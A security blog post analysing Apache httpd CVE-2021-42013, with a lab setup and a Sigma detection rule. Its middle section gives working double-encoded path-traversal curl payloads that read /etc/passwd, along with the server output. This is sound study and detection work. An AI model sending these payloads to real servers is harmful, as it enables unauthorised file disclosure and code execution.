Technical analysis and detection of Apache HTTPD CVE-2021-42013

Introduction

A new directory traversal bug was introduced in Apache httpd-2.4.49 in late September 2021. It was quickly followed by an incomplete fix in httpd-2.4.50, which was in turn followed by another fix in httpd-2.4.51. We have a previous post describing the vulnerable code in httpd-2.4.49 and the fix implemented in httpd-2.4.50. In this post, we discuss the code changes behind the new bug, assigned CVE-2021-42013, which leads to path traversal and remote code execution in httpd-2.4.50, as well as the fix and detection techniques.

In the previous post, we covered Apache httpd-2.4.49 and CVE-2021-41773. A fix was published and httpd-2.4.50 was released; however, the fix was incomplete and still allowed directory traversal and command execution.

To analyze this fix, we will first look at the source code changes to understand what changed, and then use basic fuzzing techniques to reproduce the security bug in a test environment.

Technical details

A good starting point is the Apache vulnerability page, which mentions:

If files outside of these directories are not protected by the usual default configuration
"require all denied", these requests can succeed. If CGI scripts are also
enabled for these aliased pathes, this could allow for remote code execution.

So, to be able to fuzz and reproduce the bug, we need to:

  1. Compile httpd-2.4.50 with CGI support
  2. Change the configuration of the root directory from the default (secure) setting

<Directory />
    AllowOverride none
    Require all denied
</Directory>

to the insecure setting

<Directory />
    AllowOverride none
    Require all granted
</Directory>
But first, let us take a look at the code changes between the vulnerable httpd-2.4.50 code (revision r1893775) and the current httpd-2.4.51 code (revision r1893977).

From the commit message, we see:

Merge r1893971 from trunk:

core: Add ap_unescape_url_ex() for better decoding control, and deprecate
      unused AP_NORMALIZE_DROP_PARAMETERS flag.

From the code diff, we see that ap_normalize_path() was changed in how it handles percent-encoded characters: it decodes them to their corresponding unreserved characters and now fails if it detects invalid encoding. The old function from r1893775 used a different macro together with a standard C library function and did not fail on invalid encoding, which is why the earlier fix was incomplete and double-encoded characters could slip through.

To illustrate more, let us take the following URL as an example

http://127.0.0.1/cgi-bin/%2e%2e/etc/passwd

At each position in the URI path, the old function (r1893775) checks whether the current character is '%' and whether the next two characters are hexadecimal digits ('2' and 'e' in this case), for example:

%2e or %20 or %65

The two digits after '%' are decoded with x2c() into a single character, which is then checked to ensure it is an unreserved character (the unreserved characters consist of lowercase and uppercase letters, digits, '-', '.', '_' and '~').

The check is done using the macro apr_isalnum() as well as the standard C function strchr().
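As a rough illustration of this check, here is a minimal Python sketch of the removed condition. It is a model for reasoning and not the httpd code: the names UNRESERVED, is_hex and old_check are made up for this example, and apr_isalnum() is assumed to behave as it does for plain ASCII input.

```python
import string

# Unreserved characters: letters, digits, and "-._~".
UNRESERVED = set(string.ascii_letters + string.digits + "-._~")


def is_hex(ch: str) -> bool:
    """Rough equivalent of apr_isxdigit() for a single character."""
    return len(ch) == 1 and ch in string.hexdigits


def old_check(path: str, l: int):
    """Return the decoded character if path[l:l+3] is '%XX' and XX decodes
    to an unreserved character; otherwise return None."""
    if (
        l + 2 < len(path)
        and path[l] == "%"
        and is_hex(path[l + 1])
        and is_hex(path[l + 2])
    ):
        c = chr(int(path[l + 1 : l + 3], 16))  # what x2c() computes
        if c in UNRESERVED:
            return c
    return None
```

With this model, old_check("%2e", 0) and old_check("%65", 0) return '.' and 'e', while old_check("%20", 0) returns None because a space is not an unreserved character.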

--- httpd/httpd/branches/2.4.x/server/util.c    2021/10/07 12:24:49    1893976
+++ httpd/httpd/branches/2.4.x/server/util.c    2021/10/07 12:27:43    1893977
@@ -530,23 +530,20 @@ AP_DECLARE(int) ap_normalize_path(char *
          *  be decoded to their corresponding unreserved characters by
          *  URI normalizers.
          */
-        if (decode_unreserved
-                && path[l] == '%' && apr_isxdigit(path[l + 1])
-                                  && apr_isxdigit(path[l + 2])) {
-            const char c = x2c(&path[l + 1]);
-            if (apr_isalnum(c) || (c && strchr("-._~", c))) {
-                /* Replace last char and fall through as the current
-                 * read position */
-                l += 2;
-                path[l] = c;
...

The function strchr() searches for a specific character in a string ("-._~" in this case). If strchr() finds the character, it returns a pointer to it; otherwise it returns NULL. The string literal "-._~" is NUL-terminated, and the terminating NUL counts as part of the string, so strchr() called with c == '\0' would return a pointer to the terminator instead of NULL. This is why the condition tests c before calling strchr().

The new code (r1893977) replaces the apr_isalnum() and strchr() checks with a table lookup through the TEST_CHAR() macro:

#define TEST_CHAR(c, f)   (test_char_table[(unsigned char)(c)] & (f))

-                path[l] = c;
+        if (decode_unreserved && path[l] == '%') {
+            if (apr_isxdigit(path[l + 1]) && apr_isxdigit(path[l + 2])) {
+                const char c = x2c(&path[l + 1]);
+                if (TEST_CHAR(c, T_URI_UNRESERVED)) {
+                    /* Replace last char and fall through as the current
+                     * read position */
+                    l += 2;
+                    path[l] = c;

The T_URI_UNRESERVED flag used in this lookup takes over the job of the previous apr_isalnum() and strchr() combination.

More importantly, unlike the old code, the new code has an else branch: a '%' that is not followed by two hexadecimal digits is treated as invalid encoding, and the function sets ret = 0 to signal the failure.
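The difference made by the else branch can be sketched in Python. This is a simplified model under stated assumptions: it covers only the percent-decoding step (the removal of dot segments is left out), and the function name decode_unreserved and its reject_invalid parameter are hypothetical.

```python
import string

UNRESERVED = set(string.ascii_letters + string.digits + "-._~")
HEX = set(string.hexdigits)


def decode_unreserved(path: str, reject_invalid: bool):
    """Decode %XX sequences that represent unreserved characters.

    Returns (ok, result). With reject_invalid=True, a '%' that is not
    followed by two hex digits sets ok to False, mirroring `ret = 0`.
    With reject_invalid=False, such a '%' is silently copied through.
    """
    out = []
    ok = True
    i = 0
    while i < len(path):
        ch = path[i]
        if ch == "%":
            pair = path[i + 1 : i + 3]
            if len(pair) == 2 and pair[0] in HEX and pair[1] in HEX:
                c = chr(int(pair, 16))
                if c in UNRESERVED:
                    out.append(c)
                    i += 3
                    continue
            elif reject_invalid:
                ok = False  # invalid encoding
        out.append(ch)
        i += 1
    return ok, "".join(out)
```

For the input "/cgi-bin/.%%32%65/", the lenient variant (reject_invalid=False) returns (True, "/cgi-bin/.%2e/"): the first '%' is skipped, "%32" and "%65" decode to '2' and 'e', and a fresh "%2e" is left behind. The strict variant flags the same input as a failure.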

The new revision (r1893977) also deprecates the unused AP_NORMALIZE_DROP_PARAMETERS flag and adds a new function, ap_unescape_url_ex(), with related changes in the request.c file.

Fuzzing and exploit development

After understanding the code, let us try to fuzz the vulnerable httpd-2.4.50. To do that, we set up a testing environment using Vagrant, a tool by HashiCorp for building and managing virtual machine environments in a single workflow.

Our Vagrantfile looks like this:

Vagrant.configure("2") do |config|
  config.vm.box = "geerlingguy/ubuntu1604"
  config.vm.hostname = "httpd2450"
  config.vm.box_check_update = false
  config.vm.network "forwarded_port", guest: 80, host: 8080, host_ip: "127.0.0.1"
  config.vm.provider "virtualbox" do |vb|
    vb.name = "apache-2-4-50"
    vb.gui = false
    vb.memory = "1024"
  end
  config.vm.provision "shell", path: "provision.sh"
end

It is accompanied by a provisioning script, provision.sh, that configures our vulnerable virtual machine:

#!/usr/bin/env bash
# Install the build dependencies
apt update
apt install -y libaprutil1-dev gcc libpcre3-dev make vim
# Download and unpack the vulnerable release
wget http://archive.apache.org/dist/httpd/httpd-2.4.50.tar.bz2
bzip2 -d httpd-2.4.50.tar.bz2
tar xvf httpd-2.4.50.tar
cd httpd-2.4.50
# Build and install with the CGI daemon module enabled
./configure --enable-cgid
make
make install
chown -R daemon:daemon /usr/local/apache2/
# Replace only the first "Require all denied" with "Require all granted"
sudo sed -i '0,/Require all denied/{s/Require all denied/Require all granted/}' /usr/local/apache2/conf/httpd.conf
# Start the server
sudo /usr/local/apache2/bin/apachectl start

Save those two files in a folder, make sure you have Vagrant and VirtualBox installed on your system, then invoke Vagrant:

vagrant up

If everything goes well, we should have a virtual machine running, with httpd reachable on host port 8080. Visiting localhost:8080 from our host, we should see the "It works!" message.

$ curl http://127.0.0.1:8080/
<html><body><h1>It works!</h1></body></html>

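Now we need to fuzz the cgi-bin directory, which we know is covered by the vulnerable configuration. The directory traversal sequence is '../', which refers to the parent directory on POSIX-like systems. The requests below use port 80, which applies when they are run inside the virtual machine (for example after vagrant ssh); from the host, substitute the forwarded port 8080. Sending the request from our previous post, we see that it does not work.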

$ curl -i http://127.0.0.1:80/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
HTTP/1.1 400 Bad Request
Date: Thu, 21 Oct 2021 08:11:44 GMT
Server: Apache/2.4.50 (Unix)
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
</body></html>

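This request is rejected, but the old code is still flawed. It is shown as the removed lines 7 through 15 of the r1893977 diff below. It decodes a %XX sequence only when both characters after '%' are hexadecimal digits and the decoded character is unreserved, which is checked with apr_isalnum() and strchr(). A '%' that is not followed by two hexadecimal digits is silently left in place instead of being rejected.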

1 --- httpd/httpd/branches/2.4.x/server/util.c    2021/10/07 12:24:49    1893976
2 +++ httpd/httpd/branches/2.4.x/server/util.c    2021/10/07 12:27:43    1893977
3 @@ -530,23 +530,20 @@ AP_DECLARE(int) ap_normalize_path(char *
4           *  be decoded to their corresponding unreserved characters by
5           *  URI normalizers.
6          */
7 -        if (decode_unreserved
8 -                && path[l] == '%' && apr_isxdigit(path[l + 1])
9 -                                  && apr_isxdigit(path[l + 2])) {
10 -            const char c = x2c(&path[l + 1]);
11 -            if (apr_isalnum(c) || (c && strchr("-._~", c))) {
12 -                /* Replace last char and fall through as the current
13 -                 * read position */
14 -                l += 2;
15 -                path[l] = c;
16 +        if (decode_unreserved && path[l] == '%') {
17 +            if (apr_isxdigit(path[l + 1]) && apr_isxdigit(path[l + 2])) {
18 +                const char c = x2c(&path[l + 1]);
19 +                if (TEST_CHAR(c, T_URI_UNRESERVED)) {
20 +                    /* Replace last char and fall through as the current
21 +                     * read position */
22 +                    l += 2;
23 +                    path[l] = c;
24 +                }
25 +            }
26 +            else {
27 +                /* Invalid encoding */
28 +                ret = 0;
29              }
30 -        }
32 -
33 -        if ((flags & AP_NORMALIZE_DROP_PARAMETERS) && path[l] == ';') {
34 -            do {
35 -                l++;
36 -            } while (!IS_SLASH_OR_NUL(path[l]));
37 -            continue;
38          }
39  
40          if (w == 0 || IS_SLASH(path[w - 1])) {
41 @@ -1889,8 +1886,12 @@ static char x2c(const char *what)
42   *   decoding %00 or a forbidden character returns HTTP_NOT_FOUND
43   */
44  
45 -static int unescape_url(char *url, const char *forbid, const char *reserved)
46 +static int unescape_url(char *url, const char *forbid, const char *reserved,
47 +                        unsigned int flags)
48  {
49 +    const int keep_slashes = (flags & AP_UNESCAPE_URL_KEEP_SLASHES) != 0,
50 +              forbid_slashes = (flags & AP_UNESCAPE_URL_FORBID_SLASHES) != 0,

Keep the following URL encodings in mind:

Char  URL encoding
.     %2E
%     %25
2     %32
e     %65
E     %45

First, we try double-encoding only the '%' character and send a new request:

curl -i http://127.0.0.1:80/cgi-bin/%252e%2e/%252e%2e/%252e%2e/%252e%2e/etc/passwd
HTTP/1.1 404 Not Found
Date: Sun, 24 Oct 2021 08:05:49 GMT
Server: Apache/2.4.50 (Unix)
Content-Length: 196
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>

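That does not work: '%' is not an unreserved character, so the apr_isalnum()/strchr() check does not decode %25 during normalization, and after the later unescaping the path contains a literal "%2e" rather than a dot. Let's encode the '2' instead and send the request again.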


curl -i http://127.0.0.1:80/cgi-bin/%%32e%2e/%%32e%%32e/%%32e%%32e/%%32e%%32e/etc/passwd
HTTP/1.1 200 OK
Date: Sun, 24 Oct 2021 08:09:26 GMT
Server: Apache/2.4.50 (Unix)
Last-Modified: Wed, 04 Nov 2020 18:21:18 GMT
ETag: "616-5b34c0bb322ad"
Accept-Ranges: bytes
Content-Length: 1558

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...

Success! We have a working exploit. Next, let's encode the 'e' instead and send the request again:

curl -i http://127.0.0.1:80/cgi-bin/%2%65%2%65/%2%65%2%65/%2%65%2%65/%2%65%2%65/etc/passwd
HTTP/1.1 200 OK
Date: Sun, 24 Oct 2021 08:11:34 GMT
Server: Apache/2.4.50 (Unix)
Last-Modified: Wed, 04 Nov 2020 18:21:18 GMT
ETag: "616-5b34c0bb322ad"
Accept-Ranges: bytes
Content-Length: 1558

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...

Another successful exploitation. We assume that encoding the 'E' will give the same result:

curl -i http://127.0.0.1:80/cgi-bin/%2%45%2%45/%2%45%2%45/%2%45%2%45/%2%45%2%45/etc/passwd
HTTP/1.1 200 OK
Date: Sun, 24 Oct 2021 08:13:11 GMT
Server: Apache/2.4.50 (Unix)
Last-Modified: Wed, 04 Nov 2020 18:21:18 GMT
ETag: "616-5b34c0bb322ad"
Accept-Ranges: bytes
Content-Length: 1558

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

Same results, as expected. The full exploit relies on double encoding of URL characters, so all of the following requests should work:

curl -i http://127.0.0.1:80/cgi-bin/%2%65%2%65/%2%65%2%65/%2%65%2%65/%2%65%2%65/etc/passwd
curl -i http://127.0.0.1:80/cgi-bin/%%32e%2e/%%32e%%32e/%%32e%%32e/%%32e%%32e/etc/passwd
curl -i http://127.0.0.1:80/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
curl -i http://127.0.0.1:80/cgi-bin/%2%45%2%45/%2%45%2%45/%2%45%2%45/%2%45%2%45/etc/passwd
curl -i http://127.0.0.1:80/cgi-bin/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd
curl -i http://127.0.0.1:80/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
curl -i http://127.0.0.1:80/cgi-bin/.%2%65/.%2%65/.%2%65/.%2%65/etc/passwd
curl -i http://127.0.0.1:80/cgi-bin/%%32%65./%%32%65./%%32%65./%%32%65./etc/passwd
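To see why these variants behave alike, the two decoding steps can be modelled in a few lines of Python. This is a sketch under assumptions, not the httpd implementation: lenient_pass stands in for the old unreserved-only decoding, urllib.parse.unquote stands in for the later full unescaping, and all names are made up for this example.

```python
import string
from urllib.parse import unquote

UNRESERVED = set(string.ascii_letters + string.digits + "-._~")
HEX = set(string.hexdigits)


def lenient_pass(path: str) -> str:
    """First pass: decode %XX only for unreserved characters and silently
    skip a '%' that is not followed by two hex digits."""
    out, i = [], 0
    while i < len(path):
        pair = path[i + 1 : i + 3]
        if path[i] == "%" and len(pair) == 2 and set(pair) <= HEX:
            c = chr(int(pair, 16))
            if c in UNRESERVED:
                out.append(c)
                i += 3
                continue
        out.append(path[i])
        i += 1
    return "".join(out)


def double_decode(segment: str) -> str:
    """Apply the lenient pass, then a full percent-decoding pass."""
    return unquote(lenient_pass(segment))


# Ways to write one '.' so that the first pass leaves '%2e' or '%2E' behind.
dot_variants = ["%%32e", "%2%65", "%%32%65", "%2%45", "%%32%45"]

for v in dot_variants:
    print(f"{v:10} -> {lenient_pass(v):4} -> {double_decode(v)}")
```

In this model every variant ends up as a single dot after the second pass, so a segment such as ".%%32e" becomes "..". The earlier attempt "%252e" only reaches "%2e", because "%25" decodes to '%', which is not unreserved and is therefore left untouched by the first pass.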

Alright! How do we detect this?

To detect this attack, we can look in our web server logs for these URL-encoded sequences in requests to CGI-enabled directories that returned an HTTP status such as 200 (OK) or 301 (Moved Permanently).

Here is a Sigma rule for detection:


title: CVE-2021-42013 Exploitation Attempt detected
id: 7a34e2f7-85a7-4486-9747-e1a71b9a8f76
status: experimental
description: Detects directory traversal and code execution exploitation attempts in Apache httpd-2.4.50 CVE-2021-42013.
author: Asim Jaweesh
date: 2021/10/24
references:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013
    - https://svn.apache.org/viewvc?view=revision&revision=1893977
    - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-41773.yaml
    - https://github.com/pisut4152/Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt/blob/main/web_cve_2021_41773_and_cve_2021_42013_apache_path_traversal.yml
logsource:
    category: webserver
detection:
    selection_path:
        c-uri|contains: '/cgi-bin/'
    selection_payload:
        c-uri|contains:
            - '%2%65%2%65/%2%65%2%65/%2%65%2%65/%2%65%2%65'
            - '%%32e%2e/%%32e%%32e/%%32e%%32e/%%32e%%32e'
            - '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65'
            - '%2%45%2%45/%2%45%2%45/%2%45%2%45/%2%45%2%45'
            - '.%%32e/.%%32e/.%%32e/.%%32e'
            - '.%%32%65/.%%32%65/.%%32%65/.%%32%65'
            - '.%2%65/.%2%65/.%2%65/.%2%65'
            - '%%32%65./%%32%65./%%32%65./%%32%65.'
    selection_success:
        sc-status:
            - 200
            - 301
    condition: selection_path and selection_payload and selection_success
falsepositives:
    - Unknown
tags:
    - attack.initial_access
    - attack.t1190
level: critical
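For quick triage outside a SIEM, a similar idea can be expressed in Python. Note that this is a broader heuristic than the rule above and not a translation of it: instead of matching the listed payload strings, it flags any '%' that is not followed by two hexadecimal digits, which all the payloads in this post have in common. The function name is_suspicious and its parameters are assumptions that simply mirror the c-uri and sc-status fields, and the heuristic may produce false positives on otherwise malformed URLs.

```python
import re

# A '%' that is not followed by two hexadecimal digits (invalid encoding).
INVALID_ESCAPE = re.compile(r"%(?![0-9A-Fa-f]{2})")
SUCCESS_STATUSES = {200, 301}


def is_suspicious(c_uri: str, sc_status: int) -> bool:
    """Flag successful requests under /cgi-bin/ whose URI contains
    invalid percent-encoding."""
    return (
        "/cgi-bin/" in c_uri
        and INVALID_ESCAPE.search(c_uri) is not None
        and sc_status in SUCCESS_STATUSES
    )
```

For example, is_suspicious("/cgi-bin/.%%32e/.%%32e/etc/passwd", 200) is True, while a request for "/cgi-bin/test.cgi?x=%20" with status 200 is not flagged.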
                

Conclusion

To successfully exploit CVE-2021-42013, we must double-encode the '2', 'e', or 'E' of an encoded dot in a request to a CGI-enabled directory. The fix in httpd-2.4.51 replaced the previously used macro and standard C library function with the TEST_CHAR() macro and made the normalization fail on invalid encoding. Finally, we can use the Sigma rule above for detection across different SIEM solutions.